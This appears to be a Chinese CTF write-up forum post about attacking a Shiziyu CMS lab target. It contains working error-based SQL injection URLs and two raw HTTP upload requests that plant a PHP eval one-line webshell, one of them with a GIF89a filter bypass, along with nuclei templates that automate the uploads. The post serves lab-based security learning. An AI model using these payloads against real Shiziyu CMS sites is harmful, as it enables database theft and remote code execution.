狮子鱼CMS靶场WP

sbhglqy   ·   发表于 2023-10-30 19:03:36   ·   CTF&WP专版

一、前台sql注入漏洞

在 ApiController.class.php处参数过滤存在不严谨,导致SQL注入漏洞。
爆数据库poc:

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

爆出数据库名称为shiziyu

爆表名poc:

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='test' limit 0,1),0x7e),1)

此处可以借用burp进行爆破或者借用sqlmap爆破。
爆出数据表有oscshop_access、oscshop_address、oscshop_admin、oscshop_apply、oscshop_apply_relship、oscshop_area、oscshop_bad_domain、oscshop_balance、oscshop_balance_order、oscshop_bargain_goods、oscshop_bargain_order、oscshop_bargain_order_detail
用户名密码大概率存在oscshop_admin表中,获取该表的列名。
爆列名poc:

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='oscshop_admin' limit 0,1),0x7e),1)

爆出列名有a_uname、a_true_name、a_telephone、a_email a_passwd、a_is_super、a_role_id、a_login_count。
以为用户名和密码会存在a_uname和a_passwd字段中,发现尝试了一下一个都没有,无法登录后台。
经过魔方老师提醒,flag放在shiziyu_flag表中,那就获取一下。

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='shiziyu_flag' limit 0,1),0x7e),1)

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select flag from shiziyu_flag limit 0,1),0x7e),1)


发现只获取到了一半,这里需要借助right函数。

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1 and updatexml(1,concat(0x7e,(select right(flag,20) from shiziyu_flag limit 0,1),0x7e),1)


拼接一下即可。

二、任意文件上传漏洞。

第一个文件上传漏洞

漏洞存在地址:xxxx/Common/ckeditor/plugins/multiimg/dialogs/image_upload.php
抓包,构建数据如下。

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 209

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php <span class="label label-primary">@eval($_REQUEST[8]);?</span>>
------WebKitFormBoundary8UaANmWAgM4BqBSs—

发包,查看回显。

给出文件上传位置,访问一下。记得要在上传路径前面拼接上Common才行。

执行一句话木马,获取flag。

第二个文件上传漏洞

漏洞存在地址:xxxx/wxapp.php?controller=Goods.doPageUpload
抓包,构建数据如下:

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
Host: bwo330m4vx.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 217

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="upfile"; filename="Test.php"
Content-Type: image/gif

GIF89a
<?php @eval($_REQUEST[8]);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs--

注意,这里对文件内容进行了过滤,所以此处添加了GIF89a魔术头,成功上传,获得文件地址。

访问一下,执行一句话木马,获取flag。

三、文件上传漏洞nuclei验证

第一个文件上传漏洞验证

nuclei-poc:

id: shiziyuCMS

info:
  name: shiziyuCMS-upload
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 209

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="files"; filename="test.php"
        Content-Type: image/gif

        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs—

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - image/uploads/
      - type: status
        status:
          - 200

nuclei验证

第二个文件上传漏洞验证

nuclei-poc:

id: shiziyuCMS

info:
  name: shiziyuCMS-upload2
  author: lvqiyun
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=qqd34djlksudfkaquf8s0qbaa6
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Length: 217

        ------WebKitFormBoundary8UaANmWAgM4BqBSs
        Content-Disposition: form-data; name="upfile"; filename="Test.php"
        Content-Type: image/gif

        GIF89a
        <?php @eval($_REQUEST[8]);?>
        ------WebKitFormBoundary8UaANmWAgM4BqBSs--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Uploads\/image\/goods
      - type: status
        status:
          - 200

nuclei验证

用户名金币积分时间理由
Track-魔方 300.00 0 2023-10-31 20:08:06 WP奖励

打赏我,让我更有动力~

4 条回复   |  直到 8个月前 | 904 次浏览

Track-魔方
发表于 2023-10-30

实际上数据库中有flag,在shiziyu_flag表中,手速真快

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-10-30

但,还有一处文件上传诺,需要进行绕过上传

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-10-31

【赞】

评论列表

  • 加载数据中...

编写评论内容

成风
发表于 8个月前

不错,挺详细的

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.